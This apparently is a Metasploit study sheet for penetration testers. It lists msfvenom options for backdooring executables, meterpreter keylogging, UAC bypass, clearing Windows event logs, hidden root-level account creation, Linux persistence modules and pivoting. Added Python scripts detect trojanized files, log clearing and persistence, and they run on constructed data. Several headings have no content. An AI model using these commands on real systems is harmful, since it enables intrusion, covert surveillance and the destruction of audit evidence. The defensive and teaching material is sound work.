

Metasploit Framework (MSF)

The Metasploit Framework (MSF) is an open-source, robust penetration testing and exploitation framework that is used by penetration testers and security researchers worldwide.

Essential Terminology


Metasploit Framework Architecture


MSF Modules


MSF Payload Types

The Meterpreter (Meta-Interpreter) payload is an advanced multi-functional payload that is executed in memory on the target system, which makes it difficult to detect. It communicates over a stager socket and provides an attacker with an interactive command interpreter on the target system that facilitates the execution of system commands, file system navigation, keylogging and much more.


Setup and Configuration

msfconsole Fundamentals


Workspaces

Workspaces allow you to keep track of all your hosts, scans and activities. They are extremely useful when conducting penetration tests, as they allow you to sort and organize your data by target or organization.

Usage:


Import nmap result into msfconsole

Run an nmap scan and store the output in XML format. Create a workspace. Import the results with the db_import nmap_xml_result command.

OR

Use db_nmap to perform nmap scan.

hosts : hosts from the nmap results
services : services discovered
vulns : vulnerabilities found


Route traffic through machine

Run the following command in a meterpreter session: run autoroute -s IP_to_route_through

Information gathering

FTP

SSH

SMB

SMTP

HTTP

MySql


msfvenom

Generating msfvenom payload

msfvenom --list payloads : list all payloads
msfvenom --list formats : list all output formats

Staged payload : /meterpreter/type
Stageless (unstaged) payload : /meterpreter_type

-p : payload path
LHOST : attacker IP
LPORT : attacker port
-f : output file type, e.g. exe
-a : architecture

-e : encoder (e.g. -e x86/shikata_ga_nai)
-i : number of encoding iterations

-x : inject the payload into an existing executable (template) and replace it with the backdoored copy
-k : keep the original functionality of the template executable alongside the payload
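The -x/-k options produce a file that still carries the name and behaviour of a legitimate program, so the defensive counterpart is integrity checking against a known-good manifest rather than looking at behaviour. The script below is an added example, not Metasploit code: it hashes every file under a directory with SHA-256 and reports each entry as ok, modified, missing or unexpected. The manifest and the files it checks are constructed in a temporary directory for the demo.

```python
"""Integrity check against a known-good manifest, to catch a trojanized copy
of legitimate software (the kind of file msfvenom -x/-k produces).  Added
example, not part of Metasploit; the manifest and files in run_demo() are
constructed for the demonstration."""
import hashlib
import os
import tempfile


def sha256_file(path):
    """Stream a file through SHA-256 so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def check_against_manifest(manifest, root_dir):
    """Compare the files under root_dir with manifest {relative_path: sha256}.
    Returns {relative_path: "ok" | "modified" | "missing" | "unexpected"}."""
    results = {}
    for rel, expected in manifest.items():
        path = os.path.join(root_dir, rel)
        if not os.path.isfile(path):
            results[rel] = "missing"
        else:
            results[rel] = "ok" if sha256_file(path) == expected else "modified"
    # Anything on disk that the manifest never listed is worth a look too
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), root_dir)
            if rel not in manifest:
                results[rel] = "unexpected"
    return results


def run_demo():
    """Constructed scenario: one deployed tool was replaced by a tampered copy
    of the same name, one documented file is gone, one new binary appeared."""
    good = b"MZ...original installer bytes (constructed)"
    with tempfile.TemporaryDirectory() as tmp:
        # Baseline recorded when the software was deployed
        manifest = {
            "tools/app.exe": hashlib.sha256(good).hexdigest(),
            "tools/readme.txt": hashlib.sha256(b"docs").hexdigest(),
        }
        os.makedirs(os.path.join(tmp, "tools"))
        with open(os.path.join(tmp, "tools", "app.exe"), "wb") as f:
            f.write(good + b"<appended stage, constructed>")  # same name, altered bytes
        with open(os.path.join(tmp, "tools", "dropper.exe"), "wb") as f:
            f.write(b"new binary nobody deployed (constructed)")
        return check_against_manifest(manifest, tmp)


if __name__ == "__main__":
    for rel, status in sorted(run_demo().items()):
        print(f"{status:10} {rel}")
```

The manifest should be produced at deployment time and stored where the checked host cannot rewrite it; a manifest kept next to the files it describes can be updated by whoever replaced them.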


meterpreter session basic

sessions : show all ongoing sessions
  -l : list active sessions
  -i id : interact with session id
  -k id : kill a session
  -n : name a session
  -C : run a meterpreter command on a session

sysinfo : system information
getuid : current user and privilege level
download : download a file
upload : upload a file
checksum md5 file : MD5 checksum of a file
getenv PATH : read an environment variable (here PATH)
search : search for files ( -f : file pattern, e.g. *.txt  -d : directory to search in )
shell : drop to a native shell
ps : process list
migrate pid : migrate to process pid
execute -f command : execute a command on the machine


Upgrade shell to meterpreter

use post/multi/manage/shell_to_meterpreter and set SESSION to upgrade a shell, or simply run sessions -u id


Windows POST

post/windows/manage/migrate : migrate to another process
post/windows/manage/archmigrate : migrate to a process of the native architecture

windows/gather/win_privs : gather the current user's Windows privileges
windows/gather/enum_logged_on_users : gather information about logged-on users
windows/gather/checkvm : check whether the machine is a virtual machine
windows/gather/enum_applications : enumerate installed applications and versions
windows/gather/enum_av_excluded : folders excluded from antivirus scanning
windows/gather/enum_computers : enumerate computers in the AD domain
windows/gather/enum_patches : enumerate patches installed on the system
windows/gather/enum_shares : enumerate shares the target is part of

UAC bypass

windows/local/bypassuac_injection : UAC bypass (Match architecture for payloads)

Persistence on windows

windows/local/persistence_service : Add persistence via service

windows/manage/enable_rdp : enable RDP on the system
Use net user user password to set a password for a user.
Use xfreerdp /u:username /p:password /v:host to connect over RDP.

Keylogging

From a meterpreter session:
keyscan_start : start keylogging
keyscan_dump : dump captured keystrokes
keyscan_stop : stop keylogging

Windows logs clearing

Logs can be viewed in Event Viewer.
Elevated privileges are required to clear logs.
Use the clearev meterpreter command to clear the logs.
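Clearing a Windows log is itself logged: the Security log records event 1102 ("The audit log was cleared") and the System log records event 104 ("The System log file was cleared"), both from the provider Microsoft-Windows-Eventlog, and they survive only if events are forwarded off the host before the wipe. The detection below is an added example, not Metasploit code; it runs over constructed newline-delimited JSON exports (the field names Channel, EventID, Provider, TimeCreated and User are assumptions about the export format, not a Windows standard).

```python
"""Flag Windows event-log clearing (the effect of meterpreter's clearev) in an
exported event stream.  Added example, not Metasploit code; SAMPLE_EVENTS is
constructed and the JSON field names are assumptions about the export format."""
import json

# (channel, event id) pairs that Windows writes when a log is cleared
CLEAR_EVENTS = {("Security", 1102), ("System", 104)}
CLEAR_PROVIDER = "Microsoft-Windows-Eventlog"

# Constructed sample: a logon, then both clear events, then a decoy 104 from
# another provider, then more activity by the same user
SAMPLE_EVENTS = """\
{"TimeCreated": "2024-05-01T10:00:01Z", "Channel": "Security", "EventID": 4624, "Provider": "Microsoft-Windows-Security-Auditing", "User": "jdoe"}
{"TimeCreated": "2024-05-01T10:02:15Z", "Channel": "Security", "EventID": 1102, "Provider": "Microsoft-Windows-Eventlog", "User": "jdoe"}
{"TimeCreated": "2024-05-01T10:02:16Z", "Channel": "System", "EventID": 104, "Provider": "Microsoft-Windows-Eventlog", "User": "jdoe"}
{"TimeCreated": "2024-05-01T10:03:00Z", "Channel": "System", "EventID": 104, "Provider": "Contoso-Agent", "User": "SYSTEM"}
{"TimeCreated": "2024-05-01T10:05:00Z", "Channel": "Security", "EventID": 4672, "Provider": "Microsoft-Windows-Security-Auditing", "User": "jdoe"}
"""


def find_log_clears(ndjson_text):
    """Return one alert dict per log-clear event found in the export."""
    alerts = []
    for line in ndjson_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        key = (ev.get("Channel"), int(ev.get("EventID", -1)))
        # Match on channel + id + provider so an unrelated provider reusing
        # id 104 does not fire (see the Contoso-Agent line in the sample)
        if key in CLEAR_EVENTS and ev.get("Provider") == CLEAR_PROVIDER:
            alerts.append({
                "time": ev.get("TimeCreated"),
                "channel": key[0],
                "event_id": key[1],
                "user": ev.get("User"),
            })
    return alerts


def users_who_cleared(ndjson_text):
    """Distinct users appearing on clear events, for pivoting into their other activity."""
    return sorted({a["user"] for a in find_log_clears(ndjson_text) if a["user"]})


if __name__ == "__main__":
    for a in find_log_clears(SAMPLE_EVENTS):
        print(f"{a['time']} {a['channel']} {a['event_id']} cleared by {a['user']}")
```

A gap in forwarded events right after an alert like this is the second signal worth checking: the clear event tells you the log was wiped, the gap tells you what period is now missing from the host copy.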


Linux Post Exploitation Modules

Modules used to gather information during the post-exploitation phase.

Exploiting vulnerable program

Use ps aux to list running services and check whether any of them is vulnerable.

exploit/unix/local/chkrootkit : To get root privilege

Hashdump

Establishing Persistence On Linux

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

Add a user with root privileges, named like a service account (e.g. ftp):
useradd -m username -s shell
passwd username
usermod -aG root username
usermod -u user_id username

linux/local/cron_persistence : manipulate cron jobs for persistence
exploit/linux/local/service_persistence : add persistence via a service
post/linux/manage/sshkey_persistence : add an SSH key for persistence
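Each persistence mechanism in this section leaves a trace in a configuration file, which is where a defender looks for it: an extra UID-0 account or a member of the root group in /etc/passwd and /etc/group, a system account that suddenly has a login shell, a cron job whose command lives in a temp directory, or an authorized_keys entry that is not in the approved baseline. The audit below is an added example, not Metasploit code; every file it reads is a constructed string, and the baseline of approved keys is an assumption for the demo.

```python
"""Audit for the Linux persistence mechanisms above, from the defender's side.
Added example, not part of Metasploit.  All file contents are constructed
strings; APPROVED_KEYS is an assumed baseline."""

# Constructed /etc/passwd: 'ftp' has been given UID 0, 'backup' a login shell
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ftp:x:0:1002::/home/ftp:/bin/bash
backup:x:34:34:backup:/var/backups:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
"""
# Constructed /etc/group: 'ftp' added to the root group
GROUP = """\
root:x:0:ftp
sudo:x:27:alice
"""
# Constructed system crontab (5 time fields, user, command)
CRONTAB = """\
# m h dom mon dow user command
0 2 * * * root /usr/local/bin/backup.sh
*/5 * * * * root /tmp/.cache/update.sh
"""
# Constructed authorized_keys; only the first key is in the baseline
AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyOne alice@laptop
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyTwo unknown
"""
APPROVED_KEYS = {"AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyOne"}

INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/usr/bin/bash", "/usr/bin/zsh"}
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def audit_passwd(text):
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, uid, _gid, _gecos, _home, shell = line.split(":")
        uid = int(uid)
        if uid == 0:
            if name != "root":
                findings.append(f"uid 0 account that is not root: {name}")
        elif uid < 1000 and shell in INTERACTIVE_SHELLS:
            findings.append(f"system account with interactive shell: {name} ({shell})")
    return findings


def audit_group(text):
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, _gid, members = line.split(":")
        if name == "root" and members:
            for member in members.split(","):
                findings.append(f"member of root group: {member}")
    return findings


def audit_cron(text):
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(None, 6)  # system crontab layout
        if len(fields) < 7:
            continue
        cmd = fields[6]
        if cmd.startswith(TEMP_DIRS) or any(f" {d}" in cmd for d in TEMP_DIRS):
            findings.append(f"cron job runs from a temp directory: {cmd}")
    return findings


def audit_authorized_keys(text, approved):
    # Simplification: lines with leading options (command="...") are not parsed
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0].startswith("#"):
            continue
        key_type, key_blob = parts[0], parts[1]
        comment = parts[2] if len(parts) > 2 else ""
        if key_blob not in approved:
            findings.append(f"authorized_keys entry not in baseline: {key_type} ...{key_blob[-8:]} {comment}")
    return findings


def run_audit():
    return (audit_passwd(PASSWD) + audit_group(GROUP) + audit_cron(CRONTAB)
            + audit_authorized_keys(AUTHORIZED_KEYS, APPROVED_KEYS))


if __name__ == "__main__":
    for f in run_audit():
        print("FINDING:", f)
```

The same functions take the contents of the real files (/etc/passwd, /etc/group, /etc/crontab plus /etc/cron.d/*, and each user's ~/.ssh/authorized_keys); the approved-key baseline is the one input that must come from outside the audited host.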


Pivoting

Pivoting is a post exploitation technique that involves utilizing a compromised host to attack other systems on the compromised host’s private internal network.

run autoroute -s ip_subnet

Port forwarding via a meterpreter session:
portfwd add -l local_port -p pivot_port -r pivot_machine

When running an attack through the pivot, switch to a bind payload, or set LHOST to the machine we have already exploited.


Armitage

GUI front-end for msfconsole.